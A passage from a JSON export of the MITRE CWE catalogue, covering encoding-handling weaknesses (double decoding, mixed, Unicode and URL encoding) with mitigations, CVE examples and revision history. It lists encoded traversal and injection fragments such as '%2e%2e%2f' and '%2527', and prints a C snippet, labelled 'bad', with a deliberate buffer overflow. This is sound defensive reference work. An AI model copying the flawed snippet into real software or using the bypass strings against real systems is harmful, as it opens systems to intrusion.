Encoding"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"4"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Alternate Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Alternate Encoding","attr":{"@_Date":"2010-12-13"}}]}},"174":{"attr":{"@_ID":"174","@_Name":"Double Decoding of the Same Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Availability","Integrity","Other"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1315","Description":"Forum software improperly URL decodes the highlight parameter when extracting text to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1315"},{"Reference":"CVE-2004-1939","Description":"XSS protection mechanism attempts to remove \\"/\\" that could be used to close tags, but it can be bypassed using double encoded slashes (%252F)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1939"},{"Reference":"CVE-2001-0333","Description":"Directory traversal using double encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333"},{"Reference":"CVE-2004-1938","Description":"\\"%2527\\" (double-encoded single quote) used in SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1938"},{"Reference":"CVE-2005-1945","Description":"Double hex-encoded data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1945"},{"Reference":"CVE-2005-0054","Description":"Browser executes HTML at higher privileges via URL with hostnames that are double hex encoded, which are decoded twice to generate a malicious hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0054"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Double Encoding"}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Double Encoding","attr":{"@_Date":"2008-04-11"}}}},"175":{"attr":{"@_ID":"175","@_Name":"Improper Handling of Mixed Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when the same input uses several different (mixed) encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Mixed Encoding"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Mixed Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Mixed Encoding","attr":{"@_Date":"2010-12-13"}}]}},"176":{"attr":{"@_ID":"176","@_Name":"Improper Handling of Unicode Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input contains Unicode encoding.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Windows provides the MultiByteToWideChar(), WideCharToMultiByte(), UnicodeToBytes(), and BytesToUnicode() functions to convert between arbitrary multibyte (usually ANSI) character strings and Unicode (wide character) strings. The size arguments to these functions are specified in different units, (one in bytes, the other in characters) making their use prone to error.","Body_Text":["In a multibyte character string, each character occupies a varying number of bytes, and therefore the size of such strings is most easily specified as a total number of bytes. In Unicode, however, characters are always a fixed size, and string lengths are typically given by the number of characters they contain. Mistakenly specifying the wrong units in a size argument can lead to a buffer overflow.","The following function takes a username specified as a multibyte string and a pointer to a structure for user information and populates the structure with information about the specified user. Since Windows authentication uses Unicode for usernames, the username argument is first converted from a multibyte string to a Unicode string.","This function incorrectly passes the size of unicodeUser in bytes instead of characters. The call to MultiByteToWideChar() can therefore write up to (UNLEN+1)*sizeof(WCHAR) wide characters, or (UNLEN+1)*sizeof(WCHAR)*sizeof(WCHAR) bytes, to the unicodeUser array, which has only (UNLEN+1)*sizeof(WCHAR) bytes allocated.","If the username string contains more than UNLEN characters, the call to MultiByteToWideChar() will overflow the buffer unicodeUser."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void getUserInfo(char *username, struct _USER_INFO_2 info){}","xhtml:div":{"#text":"WCHAR unicodeUser[UNLEN+1];MultiByteToWideChar(CP_ACP, 0, username, -1, unicodeUser, sizeof(unicodeUser));NetUserGetInfo(NULL, unicodeUser, 2, (LPBYTE *)&amp;info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0884","Description":"Server allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain Unicode encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884"},{"Reference":"CVE-2001-0709","Description":"Server allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0709"},{"Reference":"CVE-2001-0669","Description":"Overlaps interaction error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0669"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unicode Encoding"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC10-C","Entry_Name":"Character Encoding - UTF8 Related Issues"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"71"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Sets and Unicode&#34;, Page 446"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unicode Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Unicode Encoding","attr":{"@_Date":"2010-12-13"}}]}},"177":{"attr":{"@_ID":"177","@_Name":"Improper Handling of URL Encoding (Hex Encoding)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when all or part of an input has been URL encoded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0900","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0900"},{"Reference":"CVE-2005-2256","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2256"},{"Reference":"CVE-2004-2121","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2004-0280","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2003-0424","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0424"},{"Reference":"CVE-2001-0693","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2002-1831","Description":"Crash via hex-encoded space \\"%20\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1831"},{"Reference":"CVE-2000-0671","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2004-0189","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2002-1291","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1291"},{"Reference":"CVE-2002-1031","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2001-1140","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2004-0760","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0760"},{"Reference":"CVE-2002-1025","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2002-1213","Description":"\\"%2f\\" (encoded slash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1213"},{"Reference":"CVE-2004-0072","Description":"\\"%5c\\" (encoded backslash) and \\"%2e\\" (encoded dot) sequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0072"},{"Reference":"CVE-2004-0847","Description":"\\"%5c\\" (encoded backslash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2002-1575","Description":"\\"%0a\\" (overlaps CRLF)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"URL Encoding (Hex Encoding)"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"URL Encoding (Hex Encoding)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle URL Encoding (Hex Encoding)","attr":{"@_Date":"2010-12-13"}}]}},"178":{"attr":{"@_ID":"178","@_Name":"Improper Handling of Case Sensitivity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly account for differences in case sensitivity when accessing or determining the properties of a resource, leading to inconsistent results.","Extended_Description":{"xhtml:p":"Improperly handled case sensitive data can lead to several possible consequences, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["case-insensitive passwords reducing the size of the key space, making brute force attacks easier","bypassing filters or access controls using alternate names","multiple interpretation errors using alternate 